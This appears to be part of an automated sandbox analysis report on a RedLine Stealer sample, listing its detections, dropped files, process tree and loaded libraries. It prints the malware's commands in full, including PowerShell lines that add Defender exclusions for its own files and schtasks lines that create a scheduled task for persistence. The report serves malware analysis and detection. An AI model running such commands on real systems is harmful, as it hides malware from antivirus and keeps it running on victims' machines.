                      Source: Process Memory Space: PO.exe PID: 7532, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                      Source: Process Memory Space: PO.exe PID: 8068, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                      Source: Process Memory Space: AJzHYZtQIb.exe PID: 8164, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                      Source: PO.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: AJzHYZtQIb.exe.7.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 7.2.PO.exe.79d0000.8.raw.unpack, hWGYb7gUweomxbkY6U.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, hWGYb7gUweomxbkY6U.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, EjNspf9tdXyKYSqTEN.csSecurity API names: _0020.SetAccessControl
                      Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, EjNspf9tdXyKYSqTEN.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 7.2.PO.exe.3c3ab50.5.raw.unpack, EjNspf9tdXyKYSqTEN.csSecurity API names: _0020.AddAccessRule
                      Source: 7.2.PO.exe.79d0000.8.raw.unpack, EjNspf9tdXyKYSqTEN.csSecurity API names: _0020.SetAccessControl
                      Source: 7.2.PO.exe.79d0000.8.raw.unpack, EjNspf9tdXyKYSqTEN.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 7.2.PO.exe.79d0000.8.raw.unpack, EjNspf9tdXyKYSqTEN.csSecurity API names: _0020.AddAccessRule
                      Source: 7.2.PO.exe.2a3bdf8.2.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                      Source: 7.2.PO.exe.7180000.6.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                      Source: 7.2.PO.exe.2a2bde0.1.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@22/104@2/1
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeCode function: 0_2_00172E6F GetLastError,FormatMessageW,_wcslen,LocalFree,
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeCode function: 0_2_00185C5C FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeFile created: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7960:120:WilError_03
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7848:120:WilError_03
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeMutant created: \Sessions\1\BaseNamedObjects\KEzgwTXVdrBxFOg
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7856:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7788:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8080:120:WilError_03
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0Jump to behavior
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeCommand line argument: sfxname
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeCommand line argument: sfxstime
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeCommand line argument: STARTDLG
                      Source: w4XFffGDz1.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeFile read: C:\Windows\win.iniJump to behavior
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: PO.exe, 0000000E.00000002.2291165421.0000000006913000.00000004.00000020.00020000.00000000.sdmp, PO.exe, 0000000E.00000002.2293576595.0000000007161000.00000004.00000020.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2376563773.0000000006F77000.00000004.00000020.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000003362000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, tmp7F89.tmp.21.dr, tmpA0BE.tmp.21.dr, tmpCE16.tmp.14.dr, tmp2BB9.tmp.14.dr, tmpCDF5.tmp.14.dr, tmp2BA8.tmp.14.dr, tmp2BDA.tmp.14.dr, tmp2BD9.tmp.14.dr, tmpD8D8.tmp.21.dr, tmpA0AE.tmp.21.dr, tmpCE06.tmp.14.dr, tmpCE38.tmp.14.dr, tmp7F58.tmp.21.dr, tmp7F78.tmp.21.dr, tmpD909.tmp.21.dr, tmpCE27.tmp.14.dr, tmpD8D7.tmp.21.dr, tmp2BFA.tmp.14.dr, tmp621E.tmp.14.dr, tmp7F8A.tmp.21.dr, tmpB5DE.tmp.21.dr, tmpCE48.tmp.14.dr, tmp7F9B.tmp.21.dr, tmpD8F8.tmp.21.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: w4XFffGDz1.exeReversingLabs: Detection: 68%
                      Source: w4XFffGDz1.exeVirustotal: Detection: 67%
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeFile read: C:\Users\user\Desktop\w4XFffGDz1.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\w4XFffGDz1.exe "C:\Users\user\Desktop\w4XFffGDz1.exe"
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AJzHYZtQIb" /XML "C:\Users\user\AppData\Local\Temp\tmp61B0.tmp"
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AJzHYZtQIb" /XML "C:\Users\user\AppData\Local\Temp\tmp8574.tmp"
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess created: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe "C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe"
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe"
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AJzHYZtQIb" /XML "C:\Users\user\AppData\Local\Temp\tmp61B0.tmp"
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AJzHYZtQIb" /XML "C:\Users\user\AppData\Local\Temp\tmp8574.tmp"
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeProcess created: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe "C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe"
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: version.dll
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: dxgidebug.dll
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: sfc_os.dll
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: dwmapi.dll
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: riched20.dll
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: usp10.dll
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: msls31.dll
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: iconcodecservice.dll
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: windowscodecs.dll
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: textshaping.dll
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: textinputframework.dll
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: coreuicomponents.dll
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: coremessaging.dll
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: ntmarta.dll
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: coremessaging.dll
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: wldp.dll
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: propsys.dll
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: profapi.dll
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: edputil.dll
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: urlmon.dll
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: iertutil.dll
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: srvcli.dll
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: netutils.dll
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: windows.staterepositoryps.dll
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: policymanager.dll
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: msvcp110_win.dll
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: twinui.appcore.dll
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: execmodelproxy.dll
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: mrmcorer.dll
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: windows.staterepositorycore.dll
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: bcp47mrm.dll
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: windows.ui.dll
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: windowmanagementapi.dll
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: inputhost.dll
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: twinapi.appcore.dll
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: twinapi.appcore.dll
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: appresolver.dll
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: bcp47langs.dll
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: slc.dll
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: userenv.dll
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: sppc.dll
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: pcacli.dll
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: mpr.dll
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: windows.fileexplorer.common.dll
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: ntshrui.dll
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeSection loaded: cscapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: dwrite.dll
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: windowscodecs.dll
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: textshaping.dll
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: propsys.dll
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: edputil.dll
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: urlmon.dll
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: iertutil.dll
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: srvcli.dll
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: netutils.dll
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: windows.staterepositoryps.dll
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: appresolver.dll
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: bcp47langs.dll
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: slc.dll
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: sppc.dll
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
